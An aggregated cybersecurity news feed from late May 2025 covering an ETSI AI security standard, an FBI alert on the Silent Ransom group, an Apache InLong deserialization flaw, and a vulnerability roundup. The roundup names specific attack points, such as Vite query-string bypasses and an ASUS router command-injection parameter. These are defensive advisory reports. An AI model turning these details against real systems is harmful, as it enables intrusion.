GigaOm COO joins inaugural episode of Commvault’s new compliance podcast. The post The Evolution of Compliance and the Future of Cybersecurity appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/the-evolution-of-compliance-and-the-future-of-cybersecurity
Cybersecurity Snapshot: New Standard for AI System Security Published, While Study Finds Cyber Teams Boost Value of Business Projects
2025-05-30T13:00:00Z | 1748610000

Check out ETSI’s new global standard for securing AI systems and models. Plus, learn how CISOs and their teams add significant value to orgs’ major initiatives. In addition, discover what webinar attendees told Tenable about their cloud security challenges. And get the latest on properly decommissioning tech products; a cyber threat targeting law firms; and more!Dive into six things that are top of mind for the week ending May 30.1 - ETSI publishes global standard for AI securityWhat is the proper way to secure your artificial intelligence models and systems? Are you confused by all the different AI security recommendations and guidance? The European Telecommunications Standards Institute (ETSI) is trying to bring clarity to this issue.ETSI, in collaboration with the U.K. National Cyber Security Center (NCSC) and the U.K. Department for Science, Innovation & Technology (DSIT), has published a global standard for AI security designed to cover the full lifecycle of an AI system.Aimed at developers, vendors, operators, integrators, buyers and other AI stakeholders, ETSI’s “Securing Artificial Intelligence (SAI); Baseline Cyber Security Requirements for AI Models and Systems” technical specification outlines a set of foundational security principles for an AI system’s entire lifecycle.Here's an overview of the five stages of an AI system and the 13 security principles that must be adopted:Secure design stageRaise awareness about AI security threats and risks.Design the AI system not only for security but also for functionality and performance.Evaluate the threats and manage the risks to the AI system.Make it possible for humans to oversee AI systems.Secure development stageIdentify, track and protect the assets.Secure the infrastructure.Secure the supply chain.Document data, models and prompts.Conduct appropriate testing and evaluation.Secure deployment stageCommunication and processes associated with end-user and affected entities.Secure maintenance stageMaintain regular security updates, patches and mitigations.Monitor system behavior.Secure end-of-life stageEnsure proper data and model disposal. Each one of the 13 security principles is further broken down into multiple provisions that detail more granular requirements. For example, in the secure maintenance stage, ETSI calls for developers to test and evaluate major AI system updates as they would a new version of an AI model. Also in this stage, system operators need to analyze system and user logs to detect security issues such as anomalies and breaches.The 73-page companion technical report, “Securing Artificial Intelligence (SAI): Guide to Cyber Security for AI Models and Systems,” offers significantly more technical detail about each provision. Together the technical specification and the technical report “provide stakeholders in the AI supply chain with a robust set of baseline security requirements that help protect AI systems from evolving cyber threats,” reads an NCSC blog.For more information about AI security, check out these Tenable resources:“Harden Your Cloud Security Posture by Protecting Your Cloud Data and AI Resources” (blog)“Tenable Cloud AI Risk Report 2025” (report)“Who's Afraid of AI Risk in Cloud Environments?” (blog)“Tenable Cloud AI Risk Report 2025: Helping You Build More Secure AI Models in the Cloud” (on-demand webinar)“Securing the AI Attack Surface: Separating the Unknown from the Well Understood” (blog)2 - Report: CISOs and cyber teams pump value into business projectsCybersecurity teams’ involvement in large-scale organizational initiatives yields significant monetary benefits – especially if CISOs are incorporated early into these efforts.That’s a key finding from Ernst & Young’s “2025 EY Global Cybersecurity Leadership Insights Study,” which surveyed 550 C-suite and cybersecurity leaders globally from organizations with more than $1 billion in annual revenue.Specifically, the study found that cybersecurity teams contribute a median of $36 million to every enterprise-wide initiative they’re involved in. That’s equivalent to between 11% and 20% of the value of each project.“CISOs who are involved early in cross-function decision-making generate more value than those who were consulted late or not at all,” the report reads. “CEOs, CFOs and boards should take steps to more meaningfully integrate cybersecurity into transformations and other strategic initiatives,” it adds. The finding points to how CISOs and their cybersecurity teams are expanding their scope from managing security, risk and compliance to becoming “key enablers of business growth.”Unfortunately, over the past two years, cybersecurity budgets have shrunk as a percentage of annual revenue, and only 13% of surveyed CISOs said they get looped in early into critical business decisions.Using a framework, the report concluded that cybersecurity adds considerable value to these six key types of initiatives:Adopting and building technologyStrengthening brand trust and reputationImproving customer experienceTransforming and innovating across the businessExpanding to new marketsDeveloping new products and servicesFor more information about how CISOs and their cyber teams add value to business ventures:“Better metrics can show how cybersecurity drives business success” (CSO)“Build CISO Strategic Impact and Visibility” (IANS Research)“Nearly half of CISOs now report to CEOs, showing their rising influence” (Help Net Security)“CISOs embrace rise in prominence — with broader business authority” (CSO)“How leading CISOs build business-critical cyber cultures” (CIO)3 - Tenable poll zooms in on cloud securityDuring our recent webinar “Confident in the Cloud: How to Overcome Complexity and Get AWS Security Right,” we asked attendees about their cloud security practices and challenges. Check out what they said.(137 webinar attendees polled by Tenable, May 2025)(60 webinar attendees polled by Tenable, May 2025)Interested in learning about proven best practices for how to control and secure your AWS environment? Watch this webinar on-demand!4 - Guide: How to safely decommission tech productsIt’s important to properly dispose of software and hardware products after removing them from your IT environment.To help organizations with this process, the U.K. National Cyber Security Centre (NCSC) has published guidance on how to securely retire obsolete technical wares.“Decommissioning can be highly expensive and complex, with potentially severe repercussions if not executed properly,” the NCSC document reads. “Outdated or unsupported assets can pose an unacceptable risk to the organisation.” For example, an improperly decommissioned IT product could allow unauthorized people to access confidential data and could be used to breach services and devices.The NCSC guidance, titled “Decommissioning assets,” addresses topics including:How to plan the decommissioning processHow to carry out the decommissioning of obsolete assetsWhat to do after the decommissioning process is completedFor more information about properly disposing of obsolete hardware and software:“How to Decommission IT Hardware” (Techbuyer)“Why end-of-life IT is ruining innovation and how to fix it” (OliverWyman)“Cybersecurity guidance: Obsolete products (Canadian Centre for Cyber Security)“The Top 5 Risks of Using Obsolete and Unsupported Software” (IT Convergence)“Managing the risks of legacy IT” (Australian Cyber Security Centre)5 - FBI warns law firms about Silent Ransom threatHacker group Silent Ransom is targeting law firms via phishing calls and emails aimed at tricking employees into granting it remote access to their computers. Once they gain remote access, the attackers steal confidential data and use it to extort the victims.So said the U.S. Federal Bureau of Investigation (FBI) in an alert titled “Silent Ransom Group Targeting Law Firms.”Silent Ransom, also known as Luna Moth, Chatty Spider and UNC3753, employs two different schemes:It emails its targets offering fake, inexpensive subscriptions, and when victims request that the subscription be cancelled, the attackers email them a link that downloads remote access software on their computers.A Silent Ransom attacker calls a law firm employee and, pretending to be a member of the IT department, asks the victim to join a remote access session.Detecting a Silent Ransom attack is difficult. Its hackers don’t leave behind traditional attack indicators because they use legitimate remote-access and systems-management tools. Thus, to spot a Silent Ransom breach, the FBI recommends looking for:New, unauthorized downloads of systems-management and remote-access toolsA WinSCP or Rclone connection made to an external IP addressAnonymous emails or calls claiming data was stolenEmails regarding how to cancel a subscription serviceUnsolicited calls from individuals claiming to work in the law firm’s IT departmentTo mitigate the threat, FBI recommendations include:Train staff on recognizing and resisting phishing attempts.Establish and relay policies for when and how your law firm’s IT department will reach out to employees and prove their identities.Regularly back up company data.Adopt multi-factor authentication for all employees.For more information about remote access attacks:“12 remote access security risks and how to prevent them” (TechTarget)“Guide to Securing Remote Access Software” (CISA)“Remote-access tools the intrusion point to blame for most ransomware attacks“ (Cybersecurity Dive)“Avoiding Ratting – Remote Access Trojans” (Get Safe Online)“RDP and Other Remote Login Attacks” (Ransomware.org)6 - New, updated CIS Benchmarks for Kubernetes, Microsoft and Red Hat productsThe Center for Internet Security has updated its CIS Benchmarks for Kubernetes, Azure Kubernetes Service and Microsoft Intune, and has released a new CIS Benchmark for Red Hat Enterprise Linux Security Technical Implementation Guide (STIG).These are the CIS Benchmarks updated in April:CIS Azure Kubernetes Service (AKS) Benchmark v1.7.0CIS Kubernetes Benchmark v1.11.1CIS Microsoft Intune for Windows 10 Benchmark v4.0.0CIS Microsoft Intune for Windows 11 Benchmark v4.0.0Meanwhile, the brand new Benchmark is CIS Red Hat Enterprise Linux 9 STIG Benchmark v1.0.0. Organizations can use the CIS Benchmarks’ secure-configuration guidelines to harden products against attacks. Currently, there are more than 100 Benchmarks for 25-plus vendor product families in categories including: cloud platformsdatabasesdesktop and server softwaremobile devicesoperating systemsTo get more details, read the CIS blog “CIS Benchmarks May 2025 Update.” For more information about the CIS Benchmarks list, check out its home page, as well as:“How to use CIS benchmarks to improve public cloud security” (TechTarget)“How to Unlock the Security Benefits of the CIS Benchmarks” (Tenable)“CIS Benchmarks Communities: Where configurations meet consensus” (HelpNet Security)“CIS Benchmarks: DevOps Guide to Hardening the Cloud” (DevOps)CIS Benchmarks

https://www.tenable.com/blog/cybersecurity-snapshot-new-standard-for-ai-system-security-published-while-study-finds-cyber
ConnectWise Breached, ScreenConnect Customers Targeted
2025-05-30T12:54:03Z | 1748609643

The software company, which specializes in remote IT management, said a "sophisticated nation state actor" was behind the attack but provided few details.

https://www.darkreading.com/cyberattacks-data-breaches/connectwise-breached-screenconnect-customers-targeted
Asus routers at risk from backdoor vulnerability
2025-05-30T12:23:16Z | 1748607796

Thousands of devices have been compromised, claims GreyNoise

https://www.itpro.com/security/asus-routers-at-risk-from-backdoor-vulnerability
DDoS incident disrupts internet for thousands in Moscow
2025-05-30T12:15:10Z | 1748607310

Russian internet service provider ASVT blamed widespread outages on a DDoS incident and attributed it to a pro-Ukraine collective.

https://therecord.media/moscow-internet-provider-asvt-ddos-attack
Exploits and vulnerabilities in Q1 2025
2025-05-30T12:00:16Z | 1748606416

This report contains statistics on vulnerabilities and published exploits, along with an analysis of the most noteworthy vulnerabilities we observed in the first quarter of 2025.

https://securelist.com/vulnerabilities-and-exploits-in-q1-2025/116624/
Cisco CDA is collaborating with Politecnico di Milano to develop autonomous driving vehicles
2025-05-30T12:00:00Z | 1748606400

Learn how this amazing partnership integrates innovative technologies to enhance Italy's digital landscape and support the evolution of self-driving cars.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-cda-is-collaborating-with-politecnico-di-milano-to-develop-autonomous-driving-vehicles.html
Security Leaders Share Thoughts on Kettering Outage
2025-05-30T12:00:00Z | 1748606400

On May 19th, Kettering Health experienced an unscheduled downtime for most of its IT applications. Security leaders share some of their thoughts on the recent cyberattack.

https://www.securitymagazine.com/articles/101660-security-leaders-share-thoughts-on-kettering-outage
CERT-SE:s veckobrev v.22
2025-05-30T11:50:00Z | 1748605800

I veckan kom nyheten om Sveriges nya digitaliseringsstrategi för 2025–2030 som pekar ut riktningen för regeringens digitaliseringspolitik.

https://www.cert.se/2025/05/cert-se-veckobrev-v22.html
New Apache InLong Vulnerability (CVE-2025-27522) Exposes Systems to Remote Code Execution Risks
2025-05-30T11:34:10Z | 1748604850

A newly disclosed vulnerability, tracked as CVE-2025-27522, has been discovered in Apache InLong, a widely used real-time data streaming platform. The Apache InLong vulnerability introduces the potential for remote code execution (RCE).  The vulnerability affects Apache InLong versions 1.13.0 through 2.1.0, making a wide range of deployments potentially vulnerable. According to the official Apache security advisory, the flaw results from the deserialization of untrusted data during JDBC verification processing, allowing attackers to exploit how serialized Java objects are handled.  The Nature of the Apache InLong Vulnerability (CVE-2025-27522)  Designated as CVE-2025-27522, this vulnerability is classified as moderate in severity, yet its potential impact on production environments is far from trivial. It serves as a secondary mining bypass for a previously disclosed vulnerability, CVE-2024-26579.  This particular vulnerability stems from insecure handling of serialized data in InLong’s JDBC component. When data is received during JDBC verification, Apache InLong fails to adequately sanitize or validate the contents before deserializing them. Malicious actors could exploit this gap to send specially crafted payloads, which, when deserialized, could trigger unauthorized behavior such as file manipulation or arbitrary code execution.  Official Disclosure and Technical Insight The vulnerability was disclosed by security researchers known as yulate and m4x, and was officially published in a message by Charles Zhang to Apache’s developer mailing list on Wednesday, May 28. According to Apache, affected users should immediately upgrade to InLong version 2.2.0 or apply the fix included in GitHub Pull Request #11732.  The CVE entry for CVE-2025-27522 can be found in the official CVE database. Apache’s GitHub repository includes detailed documentation of the issue and the remediation steps taken in the patch. The patch, merged by contributor dockerzhang on February 9, addressed sensitive parameter bypasses during JDBC processing.  Security Implications and Exploitation Risk  While no public proof-of-concept or reports of active exploitation have surfaced, the vulnerability is considered network-exploitable and does not require user interaction, which elevates the risk. The Common Weakness Enumeration (CWE) identifier assigned to this flaw is CWE-502: Deserialization of Untrusted Data—a well-known class of vulnerabilities that has historically led to severe security breaches.  According to Apache, the CVSS v3.1 base score for CVE-2025-27522 ranges between 5.3 and 6.5, indicating a moderate to high severity level. Given its potential for enabling remote code execution, even moderate CVSS scores warrant serious attention. Recommended Mitigation Steps  To mitigate the Apache InLong vulnerability:  Upgrade to Apache InLong 2.2.0 immediately.  Alternatively, apply the cherry-picked patch #11732 from the Apache GitHub repository.  Restrict sources of serialized data and implement input validation and sanitization on all data that may be deserialized.  Monitor systems for signs of suspicious deserialization behavior or unauthorized activity.  A sample secure deserialization code snippet for Java can help reduce similar risks in custom implementations:  Conclusion  CVE-2025-27522 highlights how deserialization vulnerabilities can target enterprise systems. Given Apache InLong's role in managing large-scale data ingestion and distribution, any security flaw, especially one that could lead to remote code execution, requires quick and decisive action. Security teams should prioritize applying the patch or upgrading to Apache InLong 2.2.0, while also reinforcing general deserialization protections across their application stack.

https://thecyberexpress.com/apache-inlong-cve-2025-27522/
China-Linked Hackers Exploit SAP and SQL Server Flaws in Attacks Across Asia and Brazil
2025-05-30T11:12:00Z | 1748603520

The China-linked threat actor behind the recent in-the-wild exploitation of a critical security flaw in SAP NetWeaver has been attributed to a broader set of attacks targeting organizations in Brazil, India, and Southeast Asia since 2023. "The threat actor mainly targets the SQL injection vulnerabilities discovered on web applications to access the SQL servers of targeted organizations," Trend...

https://thehackernews.com/2025/05/china-linked-hackers-exploit-sap-and.html
A deep dive into Axiom’s Halo2 circuits
2025-05-30T11:00:00Z | 1748602800

Over two audits in 2023, we reviewed a blockchain system developed by Axiom that allows computing over the entire history of Ethereum, all verified by zero-knowledge proofs (ZKPs) on-chain using ZK-verified elliptic curve and SNARK recursion operations. This system is built using the Halo2 framework—a complex, emerging technology that presents many challenges when building a secure application, including potential under-constrained issues resulting from its low-level API.

https://blog.trailofbits.com/2025/05/30/a-deep-dive-into-axioms-halo2-circuits/
A flaw in OneDrive’s File Picker feature could give access to hundreds of apps
2025-05-30T10:45:00Z | 1748601900

The OneDrive File Picker flaw could affect hundreds of apps, researchers warn

https://www.itpro.com/security/onedrive-file-picker-flaw-oasis-security
From the "Department of No" to a "Culture of Yes": A Healthcare CISO's Journey to Enabling Modern Care
2025-05-30T10:30:00Z | 1748601000

Breaking Out of the Security Mosh Pit When Jason Elrod, CISO of MultiCare Health System, describes legacy healthcare IT environments, he doesn't mince words: "Healthcare loves to walk backwards into the future. And this is how we got here, because there are a lot of things that we could have prepared for that we didn't, because we were so concentrated on where we were." This chaotic approach has...

https://thehackernews.com/2025/05/from-department-of-no-to-culture-of-yes.html
Crims defeat human intelligence with fake AI installers they poison with ransomware
2025-05-30T10:25:11Z | 1748600711

Take care when downloading AI freebies, researcher tells The Register Criminals are using installers for fake AI software to distribute ransomware and other destructive malware.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/fake_ai_installers_carry_ransomware/
Treasury Sanctions FUNNULL for Enabling Global Cybercrime
2025-05-30T10:19:03Z | 1748600343

We've added plenty of new functionality to our data enrichment feature - you can now enrich an ASN and an IPv6 address. We've also provided Enterprise users the ability to drill-down into IOFA Feed data with a dedicated space for curated IOFA Feeds, and an all-new 'Feed Analytics' screen. The post Treasury Sanctions FUNNULL for Enabling Global Cybercrime appeared first on Silent Push.

https://www.silentpush.com/news/treasury-sanctions-funnull/
CC-4661 - Santesoft Releases Security Update for Sante DICOM Viewer Pro
2025-05-30T10:00:00Z | 1748599200

Severity: Medium CVE-2025-5307 could allow a local attacker to disclose sensitive information or execute arbitrary code CVE-2025-5307 could allow a local attacker to disclose sensitive information or execute arbitrary code Updated: 30 May 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4661
Data watchdog put cops on naughty step for lost CCTV footage
2025-05-30T09:29:14Z | 1748597354

Greater Manchester Police reprimanded over hours of video that went AWOL The UK’s data watchdog has reprimanded Greater Manchester Police (GMP) force for losing CCTV footage the cop shop was later requested to retain.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/uk_data_watchdog_found_police/
UK SMBs are ramping up cybersecurity spending – and it’s about time
2025-05-30T09:26:47Z | 1748597207

While small businesses are aiming to bolster their cyber defences, they're wary of AI

https://www.itpro.com/security/uk-smbs-are-ramping-up-cybersecurity-spending-and-its-about-time
This month in security with Tony Anscombe – May 2025 edition
2025-05-30T09:00:00Z | 1748595600

From a flurry of attacks targeting UK retailers to campaigns corralling end-of-life routers into botnets, it's a wrap on another month filled with impactful cybersecurity news

https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-may-2025/
The UK wants you to sign up for £1B cyber defense force
2025-05-30T08:31:10Z | 1748593870

War in Ukraine causes major rethink in policy and spending The UK is spending more than £1 billion ($1.35 billion) setting up a new Cyber and Electromagnetic Command and is recruiting a few good men and women to join up and staff it.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/uk_cyber_defense/
Interlock ransomware: what you need to know
2025-05-30T08:23:50Z | 1748593430

"We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks. Learn more about what you need to know about Interlock in my article on the Tripwire State of Security blog.

https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know
Infosecurity Europe 2025 drives cybersecurity priorities amid growing global risks
2025-05-30T08:00:16Z | 1748592016

30-year anniversary event adds classes and sessions to address new risks Partner content  Infosecurity Europe celebrates its 30th anniversary by doubling down on its mission: Building a Safer Cyber World. Returning to ExCeL London from 3-5 June, the landmark edition of Europe's most influential cybersecurity event is set to be its most ambitious yet. With global cyberthreats mounting in scale and sophistication, the 2025 show will deliver strategic insight, practical training, and powerful connections across three days of expert content and community collaboration.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/infosecurity_europe_2025_global_risk_cybersecurity/
U.S. Sanctions Funnull for $200M Romance Baiting Scams Tied to Crypto Fraud
2025-05-30T07:51:00Z | 1748591460

The U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) has levied sanctions against a Philippines-based company named Funnull Technology Inc. and its administrator Liu Lizhi for providing infrastructure to conduct romance baiting scams that led to massive cryptocurrency losses. The Treasury accused the Taguig-headquartered company of enabling thousands of websites involved in...

https://thehackernews.com/2025/05/us-sanctions-funnull-for-200m-romance.html
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 21/2025
2025-05-30T07:22:26Z | 1748589746

This week, we are reporting on a widespread malware targeting Android TV devices.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-212025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 21/2025
2025-05-30T07:22:26Z | 1748589746

This week, we are reporting on a widespread malware targeting Android TV devices.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-212025
The Week in Vulnerabilities: Cyble Sensors Detect Attack Attempts on SAP, Ivanti
2025-05-30T06:47:34Z | 1748587654

Attack attempts picked up by Cyble Sensors' honeypots highlight threat actors' resourcefulness and the need for strong security defenses. Cyble's honeypot sensors have detected attack attempts on product vulnerabilities from SAP and Ivanti, among other vulnerabilities targeted this week. The sensors, part of Cyble's Threat Hunting service, capture real-time attack data, including exploit attempts, malware intrusions, financial fraud, and brute-force attacks. Cyble's weekly Sensor Intelligence report to clients also detailed numerous malware attacks such as CoinMiner Linux, WannaCry, Linux Mirai Coin Miner, Linux IRCBot, and Android Coin Hive Miner. Also, this week, Cyble Vulnerability Intelligence researchers flagged high-risk IT and industrial control system (ICS) vulnerabilities for security teams to prioritize. Here are some highlights from those reports. Cyble Sensors Detect SAP, Ivanti Exploit Attempts Here are a few of the dozens of vulnerabilities targeted in exploit attempts detected by Cyble sensors this week. SAP NetWeaver Visual Composer Metadata Uploader is affected by a critical security flaw, designated as CVE-2025-31324, due to missing authorization controls, which could allow unauthenticated users to upload malicious binaries that could compromise the host system. The flaw has been patched (sign-in required). An authentication flaw, identified as CVE-2025-4427, in the API of Ivanti Endpoint Manager Mobile versions up to 12.5.0.0 could allow unauthorized access to protected resources without requiring valid authentication. Cyble vulnerability researchers also highlighted the SAP and Ivanti vulnerabilities in last week's report. CrushFTP versions 10 (prior to 10.8.4) and 11 (prior to 11.3.1) are vulnerable to an authentication bypass flaw affecting the crushadmin account. The vulnerability (CVE-2025-31161) stems from a race condition in the AWS4-HMAC authorization method used by the server's HTTP component. The flaw could allow attackers to bypass authentication by exploiting how the server verifies user existence without requiring a password. The issue can be further stabilized using a crafted AWS4-HMAC header, potentially enabling unauthorized access to any known or guessable user account. Successful exploitation can lead to full system compromise, especially if a DMZ proxy instance is not in use. Cyble sensors also detected attack attempts on a pair of vulnerabilities in Vite Dev Server, a frontend tooling framework for JavaScript. CVE-2025-31125 could allow unintended exposure of restricted file contents via specific query parameters. The flaw only affects apps that make the Vite dev server publicly accessible using --host or server.host. CVE-2025-30208 could allow the @fs file access restriction to be bypassed by appending specially crafted query parameters such as ?raw?? or ?import&raw??. The vulnerability arises due to incorrect handling of trailing characters in the query string, potentially enabling attackers to access files outside the allowed path. The issue affects versions before 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10, and only impacts servers exposed to the network. IT and ICS Vulnerabilities Examined Cyble vulnerability researchers examined 17 IT and ICS vulnerabilities this week, including six under discussion by threat actors on dark web forums, and flagged four as meriting high-priority attention by security teams. CVE-2025-47949 affects all versions of the samlify Node.js library prior to version 2.10.0. Samlify is widely used for implementing SAML 2.0 Single Sign-On (SSO) in enterprise applications. The flaw could potentially allow attackers to forge SAML authentication responses, bypassing login protections and impersonating any user, including administrators. CVE-2023-39780 is a high-severity vulnerability affecting ASUS RT-AX55 routers running firmware version 3.0.0.4.386.51598. The flaw could allow authenticated attackers to perform operating system (OS) command injection via the /start_apply.htm endpoint, specifically through the qos_bw_rulelist parameter. Attackers could execute arbitrary commands on the device, potentially gaining administrative control or launching further attacks on the network. Recently, researchers disclosed that attackers have exploited this vulnerability in a widespread and stealthy botnet campaign, compromising over 9,000 ASUS routers and enabling persistent, unauthorized access to the affected devices. Rockwell Automation's FactoryTalk Historian ThingWorx (95057C-FTHTWXCT11: Versions v4.02.00 and prior) is vulnerable to a 2018 Apache log4net vulnerability involving Improper Restriction of XML External Entity (XXE) Reference. This remotely exploitable vulnerability, which requires low attack complexity, could allow attackers to execute XXE-based attacks by leveraging malicious log4net configuration files, potentially leading to data exposure or further compromise. The risk is further intensified by Cyble researchers' observation of internet-facing instances of the affected product, underscoring the need for immediate mitigation efforts. Johnson Controls' iSTAR Configuration Utility (ICU), a key element in managing physical access and integrating with CCTV systems, is deployed across sectors such as energy, transport, critical manufacturing, and government. A recently disclosed vulnerability, CVE-2025-26383, could be exploited to leak memory from the ICU, potentially exposing sensitive data related to access control operations. Given the ICU's central role in safeguarding restricted areas, such an exposure could pose a significant risk to the integrity and confidentiality of physical security environments. Conclusion The wide range of IT and ICS vulnerabilities highlighted this week shows the creativity and resourcefulness of threat actors. These vulnerabilities require equal commitment from security teams charged with defending IT and critical infrastructures. A risk-based vulnerability management program should be at the heart of those defensive efforts. Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets, removing or protecting web-facing assets, Zero-Trust access principles, ransomware-resistant backups, hardened endpoints, infrastructure, and configurations, network, endpoint, and cloud monitoring, and well-rehearsed incident response plans. Cyble's comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes. They can also monitor for leaked credentials and other early warning signs of major cyberattacks. Get a free external threat profile for your organization today. The post The Week in Vulnerabilities: Cyble Sensors Detect Attack Attempts on SAP, Ivanti appeared first on Cyble.

https://cyble.com/blog/cyble-sensors-detects-vulnerabilities/
ConnectWise Hit by Cyberattack; Nation-State Actor Suspected in Targeted Breach
2025-05-30T06:11:00Z | 1748585460

ConnectWise, the developer of remote access and support software ScreenConnect, has disclosed that it was the victim of a cyber attack that it said was likely perpetrated by a nation-state threat actor. "ConnectWise recently learned of suspicious activity within our environment that we believe was tied to a sophisticated nation-state actor, which affected a very small number of ScreenConnect...

https://thehackernews.com/2025/05/connectwise-hit-by-cyberattack-nation.html
'Everest Group' Extorts Global Orgs via SAP's HR Tool
2025-05-30T05:00:00Z | 1748581200

In addition to Coca-Cola, entities in Abu Dhabi, Jordan, Namibia, South Africa, and Switzerland are experiencing extortion attacks, all involving stolen SAP SuccessFactor data.

https://www.darkreading.com/cyberattacks-data-breaches/everest-group-extorts-global-orgs-hr-tool
Better Together: How MFA and Strong Password Practices Can Help Bolster Security
2025-05-30T05:00:00Z | 1748581200

As threats become more sophisticated, cybercriminals are finding ways to get around MFA measures. This poses the question: is MFA enough to protect against modern threats?

https://www.securitymagazine.com/blogs/14-security-blog/post/101658-better-together-how-mfa-and-strong-password-practices-can-help-bolster-security
Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas
2025-05-30T04:09:00Z | 1748578140

Meta on Thursday revealed that it disrupted three covert influence operations originating from Iran, China, and Romania during the first quarter of 2025. "We detected and removed these campaigns before they were able to build authentic audiences on our apps," the social media giant said in its quarterly Adversarial Threat Report. This included a network of 658 accounts on Facebook, 14 Pages, and...

https://thehackernews.com/2025/05/meta-disrupts-influence-ops-targeting.html
Security Alert (A25-05-20): Vulnerability in Apache Tomcat
2025-05-30T04:00:00Z | 1748577600

The Apache Software Foundation released security updates to address the vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-05-21): Multiple Vulnerabilities in Microsoft Edge
2025-05-30T04:00:00Z | 1748577600

Microsoft released a security update to address vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
DragonForce Exploits SimpleHelp Flaws to Deploy Ransomware Across Customer Endpoints
2025-05-30T03:17:47Z | 1748575067

The threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider’s (MSP) SimpleHelp remote monitoring and management (RMM) tool, and then leveraged it to exfiltrate data and drop the locker on multiple endpoints. It’s believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that […]

https://thecyberpost.com/news/hackers/dragonforce-exploits-simplehelp-flaws-to-deploy-ransomware-across-customer-endpoints/
Cybercriminals Target AI Users with Malware-Loaded Installers Posing as Popular Tools
2025-05-30T03:17:07Z | 1748575027

Fake installers for popular artificial intelligence (AI) tools like OpenAI ChatGPT and InVideo AI are being used as lures to propagate various threats, such as the CyberLock and Lucky_Gh0$t ransomware families, and a new malware dubbed Numero. “CyberLock ransomware, developed using PowerShell, primarily focuses on encrypting specific files on the victim’s system,” Cisco Talos researcher […]

https://thecyberpost.com/news/hackers/cybercriminals-target-ai-users-with-malware-loaded-installers-posing-as-popular-tools/
Microsoft Edge Multiple Vulnerabilities
2025-05-30T03:00:00Z | 1748574000

Multiple vulnerabilities were identified in Microsoft Edge. A remote attacker could exploit some of these vulnerabilities to trigger sensitive information disclosure, denial of service condition, data manipulation and remote code execution on the targeted system. Impact Remote Code Execution Denial of Service Information Disclosure Data Manipulation System / Technologies affected Microsoft Edge Stable Channel version prior to 137.0.3296.52 Microsoft Edge Extended Stable Channel prior to 136.0.3240.104 Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor: Update to Microsoft Edge Stable Channel version 137.0.3296.52 or later Update to Microsoft Edge Extended Stable Channel version 136.0.3240.104 or later

https://www.hkcert.org/security-bulletin/microsoft-edge-multiple-vulnerabilities_20250530
U.S. Sanctions Cloud Provider ‘Funnull’ as Top Source of ‘Pig Butchering’ Scams
2025-05-30T01:55:16Z | 1748570116

The U.S. government today imposed economic sanctions on Funnull Technology Inc., a Philippines-based company that provides computer infrastructure for hundreds of thousands of websites involved in virtual currency investment scams, commonly known as “pig butchering." In January 2025, KrebsOnSecurity detailed how Funnull was being used as a content delivery network that catered to cybercriminals seeking to route their traffic through U.S.-based cloud providers.

https://krebsonsecurity.com/2025/05/u-s-sanctions-cloud-provider-funnull-as-top-source-of-pig-butchering-scams/
Security outfit SentinelOne's services back online after lengthy outage
2025-05-30T00:33:15Z | 1748565195

Probably not a cyber-incident, but definitely not a good look Security services vendor SentinelOne experienced a major outage on Thursday.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/sentinelone_outage/
Feds gut host behind pig butchering scams that bilked $200M from Americans
2025-05-30T00:15:13Z | 1748564113

Philippines company allegedly run by Chinese national has form running scams The US Treasury has sanctioned a Philippine company and its administrator after linking them to the infrastructure behind the majority of so-called "pig butchering" scams reported to the FBI.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/fbi_treasury_funnull_sanctions/
Multiples vulnérabilités dans le noyau Linux de SUSE (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, un contournement de la politique de sécurité et un déni de service.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0465/
Multiples vulnérabilités dans ISC Kea DHCP (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

De multiples vulnérabilités ont été découvertes dans ISC Kea DHCP. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0459/
Vulnérabilité dans Spring Cloud Gateway Server (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

Une vulnérabilité a été découverte dans Spring Cloud Gateway Server. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0460/
Vulnérabilité dans Apache Tomcat (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

Une vulnérabilité a été découverte dans Apache Tomcat. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0461/
Multiples vulnérabilités dans Microsoft Edge (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

